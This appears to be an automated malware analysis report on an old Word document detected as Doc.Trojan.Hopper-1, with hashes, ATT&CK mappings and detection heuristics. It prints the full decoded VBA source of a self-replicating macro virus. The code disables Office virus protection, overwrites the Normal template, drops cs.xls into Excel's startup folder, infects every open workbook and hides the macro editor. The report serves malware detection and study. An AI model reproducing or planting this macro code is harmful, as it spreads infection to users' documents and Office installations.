Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 77156a37c2da450c…

MALICIOUS

Office (OLE)

Size: 36.5 KB
Created: 1999-07-10 10:11:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 49647389d3c35f84536a5184426618c7
SHA-1: 11a26efad3ba9792165c95c95961b7de0c8c92d1
SHA-256: 77156a37c2da450c92cd2751049bea55dec4840af5ba0da1d7940148df82b3f3
Risk Score: 220

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious OLE document containing VBA macros. The macros attempt to establish persistence by copying themselves to the Excel startup directory as 'cs.xls' and also to the Normal template. This suggests the malware aims to execute malicious code whenever Microsoft Office applications are launched.

Heuristics 4

  • ClamAV: Doc.Trojan.Hopper-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3149 bytes
SHA-256: 0f25d872f34f98bcbe39a12981dc83e5535c7fff06c82f63ba2aa8a426ae8421
Detection
ClamAV: Doc.Trojan.Hopper-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'MultiSys
Private RunFlag As Boolean
Private Sub Document_Close()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'MultiSys" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        xlsObj = GetObject(, "Excel.Application"): Quit = 0
        If xlsObj = "" Then Set xlApp = CreateObject("Excel.Application"): Quit = 1
        If UCase(Dir(xlApp.Application.StartupPath + "\cs.xls")) <> UCase("CS.XLS") Then
            xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\cs.xls"
            xlApp.Workbooks("cs.xls").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            xlApp.Workbooks("cs.xls").Close SaveChanges:=True
        End If
        If Quit = 1 Then xlApp.Application.Quit
    End If
    If AD.Lines(1, 1) <> "'MultiSys" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub
Sub ViewVBCode(): Stealth: End Sub
Sub ToolsMacro(): Stealth: End Sub
Sub FileTemplates(): Stealth: End Sub
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    If UCase(Dir(Application.StartupPath + "\cs.xls")) <> "CS.XLS" And RunFlag <> True Then
        RunFlag = True
        Set WordObj = GetObject(, "Word.Application"): Quit = 0
        If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): Quit = 1
        Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
        If NT.Lines(1, 1) <> "'MultiSys" Then
            WordObj.Options.SaveNormalPrompt = False
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
        If Quit = 1 Then WordObj.Application.Quit
        Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\cs.xls", FileFormat:=xlNormal, AddToMru:=False
        Workbooks("cs.xls").Close SaveChanges:=True
    End If
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'MultiSys" Then
            Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
    Next
End Sub